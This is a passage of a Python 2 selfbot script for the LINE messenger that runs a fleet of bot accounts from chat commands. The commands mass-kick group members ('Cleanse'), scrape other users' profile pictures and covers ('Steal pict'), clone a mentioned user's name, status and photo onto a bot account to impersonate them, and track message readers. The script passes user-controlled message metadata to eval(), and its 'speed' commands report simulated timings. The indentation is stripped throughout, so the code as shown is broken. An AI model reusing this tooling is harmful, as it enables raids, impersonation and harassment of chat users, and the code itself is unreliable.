if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Clock on/off function: start-------------------#
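# Clock feature: while wait["clock"] is True, bot 4 (kc) gets the current time
# appended to its display name, using wait["cName4"] as the name prefix.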
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Clock on/off function: finish-------------------#
#-------------Change-clock function: start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Change-clock function: finish-----------------#
#-------------Clock-update function: start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Clock-update function: finish-------------------#
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
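# The "speed" commands below mostly sleep for a fixed interval and report that as the
# response time, so those figures are simulated. Only "Sp asli" and "Speedbot" time an
# actual sendText call from the client side.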
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speed respon" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Sp turunin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Sp naikin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Turun lagi" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = k1.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
k1.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
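# "BotN clone @user" copies the mentioned user's display name, status message and
# profile picture onto the corresponding bot account via getProfile/updateProfile and
# updateProfilePicture. The target mid is taken from msg.contentMetadata["MENTION"].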
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = k1.getContact(target)
X = contact.displayName
profile = k1.getProfile()
profile.displayName = X
k1.updateProfile(profile)
k1.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = k1.getProfile()
lol.statusMessage = Y
k1.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
k1.updateProfilePicture(P)
except Exception as e:
k1.sendText(msg.to, "Failed!")
print e
#=================================================
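# "BotN backup" (without "run") restores the display name, status message and picture
# that "BotN backup run" saved to the plain-text files above, then re-applies them
# with updateProfile/updateProfilePicture.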
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = k1.getProfile()
profile.displayName = x
k1.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = k1.getProfile()
cak.statusMessage = y
k1.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
k1.updateProfilePicture(p)
k1.sendText(msg.to, "Succes")
except Exception as e:
k1.sendText(msg.to,"Gagagl!")
print e
#=================================================
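# Read-point ("CCTV") feature: "Cctv" stores the id of the current message in
# wait2['readPoint'] for this room; the receive handler elsewhere in the script is
# assumed to append readers to wait2['readMember'] / wait2['ROM'], which "Toong" and
# "Intip" later print as the read/sider report.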
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Cek CCTV di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Toong":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : ✰Ќriֆ✰ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰||\n\n>Pelaku CCTV<\n%s-=CCTV=-\n•Bintitan\n•Panuan\n•Kurapan\n•Kudisan\n\nAmiin Ya Allah\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Koplak\nBaru Ketik Toong\nDASAR PIKUN ♪")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "✔ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰\nRead : %s\n\n✖ Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------Wipe-group function (does not kick fellow Bots/Admins)----------#
elif "Cleanse" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#----------------Join-group function: start-----------------------#
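# Join flow used below: temporarily clear preventJoinByTicket on the group, reissue a
# ticket, let each bot account accept the invitation by ticket, then lock the group again.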
elif msg.text in ["One piece","Kr asup","Asup"]: #Panggil Semua Bot
if msg.from_ in owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.sendText(msg.to,"Hello " + str(ginfo.name))
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.from_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Join-group function: finish---------------#
#-------------Leave-group function: start---------------#
elif msg.text in ["Kabur all","Ampih"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Kabur"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
k5.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Leave-group function: finish---------------#
#-------------Tag-all function: start---------------#
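# Tag-all: "Emak" builds the MENTION metadata by hand for every member in one message,
# while "Abah"/"Crot" split the member list into chunks of ~100 and call mention2() per
# chunk, apparently to stay under a per-message mention limit (mention2 and Message are
# assumed to be defined earlier in the script).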
elif msg.text in ["Emak"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Abah"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif msg.text in ["Crot"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members\n\nCrot... crot... aww.. Muncrat...!!!"
cnt.to = msg.to
cl.sendMessage(cnt)
#-------------Tag-all function: finish---------------#
